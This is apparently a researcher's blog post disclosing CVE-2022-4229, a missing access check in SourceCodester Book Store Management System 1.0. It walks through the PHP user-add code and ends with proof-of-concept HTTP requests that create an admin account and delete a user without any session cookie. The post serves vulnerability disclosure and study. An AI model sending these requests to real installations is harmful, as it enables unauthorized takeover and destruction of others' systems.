Home CVE-2022-4229: SourceCodester Book Store Management System 1.0 /bsms_ci/index.php Access Control
Post
Cancel

CVE-2022-4229: SourceCodester Book Store Management System 1.0 /bsms_ci/index.php Access Control

Introduction

In the realm of cybersecurity, discovering a vulnerability and obtaining a CVE (Common Vulnerabilities and Exposures) entry is a significant achievement. It marks a milestone in an individualā€™s journey as a security researcher, demonstrating their expertise and contribution to the field. In this blog post, I am excited to share my personal journey of uncovering one of the initial CVEs identified by our team. We will delve into the details of CVE-2022-4229, a specific vulnerability impacting the SourceCodester Book Store Management System 1.0, and discuss the implications of its access control issue.

Understanding CVE-2022-4229

CVE-2022-4229 is a vulnerability classified as critical was found in SourceCodester Book Store Management System 1.0. This vulnerability affects an unknown part of the file /bsms_ci/index.php. The manipulation with an unknown input leads to a access control vulnerability. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. As an impact it is known to affect confidentiality, integrity, and availability.

Affected product(s)/code base: Book Store Management System Source Code

Affected component(s):

  • /bsms_ci/index.php/category/*
  • /bsms_ci/index.php/book/*
  • /bsms_ci/index.php/transaction/*
  • /bsms_ci/index.php/history/*
  • /bsms_ci/index.php/user/*

Technical Details

System Installation/Setup

  1. Open your XAMPP Control Panel and start Apache and MySQL.
  2. Extract the downloaded source code zip file.
  3. Copy the extracted source code folder and paste it into the XAMPPā€™s ā€œhtdocsā€ directory.
  4. Browse the PHPMyAdmin in a browser. i.e. http://localhost/phpmyadmin
  5. Create a new database named ci_bsms_db.
  6. Import the provided SQL file. The file is known as ci_bsms_db.sql located inside the database folder.
  7. Browse the Book Store Management System in a browser. i.e. http://localhost/bsms_ci/

Source Code Analyst

A PHP function called add() responsible for adding a user in the context of a Book Store Management System. Hereā€™s a breakdown of the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* Location: ./application/controllers/User.php */
public function add()
{
    if ($this->input->post('save')) {
		if ($this->user->save_user()) {
            $this->session->set_flashdata('message', 'Used Added Successfully');
            redirect('user','refresh');
        } else {
            $this->session->set_flashdata('message', 'Failed to Add');
            redirect('user','refresh');
        }
    }
}

When this function is called, it first checks if the ā€˜saveā€™ parameter is present in the POST request. If it exists, it calls the save_user() function of the $this->user object.

If the save_user() function returns true, indicating that the user was successfully saved in the system, the code sets a flash message using set_flashdata() with the message ā€œUser Added Successfullyā€. It then redirects the user to the ā€˜userā€™ page using the redirect() function.

On the other hand, if the save_user() function returns false, indicating a failure in saving the user, the code sets a flash message with the message ā€œFailed to Addā€ and redirects the user to the ā€˜userā€™ page.

The save_user() function is called to save the userā€™s information into the database. Here is the code for the function:

1
2
3
4
5
6
7
8
9
10
11
12
/* Location: ./application/models/M_user.php */
public function save_user()
{
		$object=array(
				'user_code'=>$this->input->post('user_code'),
				'fullname'=>$this->input->post('fullname'),
				'username'=>$this->input->post('username'),
				'password'=>md5($this->input->post('password')),
				'level'=>$this->input->post('level')
			);
		return $this->db->insert('user', $object);
}

In this code, the function creates an array called $object that contains the userā€™s information. It retrieves the data from the POST request parameters such as user_code, fullname, username, password, and level. The md5() function is used to hash the password before storing it in the database.

The function then calls the insert() method of the database object ($this->db) to insert the $object array into the user table.

The function returns the result of the insert() method, which indicates whether the user was successfully saved in the database or not.

āŸ¹ After analyzing the code, it appears that there is a missing check for user authorization or privileges in the add() function. This omission can potentially lead to a security vulnerability where unauthorized users can access and add users to the system.

Exploitation Execution

Request:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /bsms_ci/index.php/user/add HTTP/1.1
Host: localhost
Content-Length: 64
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/bsms_ci/index.php/user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

fullname=john&username=john&password=12345&level=admin&save=Save

Add new account without cookie

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
GET /bsms_ci/index.php/user/hapus/2 HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/bsms_ci/index.php/user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Delete account without cookie

This post is licensed under CC BY 4.0 by the author.

CVE-2022-4228: SourceCodester Book Store Managerment System 1.0 Password Information Disclosure

CVE-2023-2684: File Renaming on Upload <= 2.5.1 - Authenticated (Admin+) Stored Cross-Site Scripting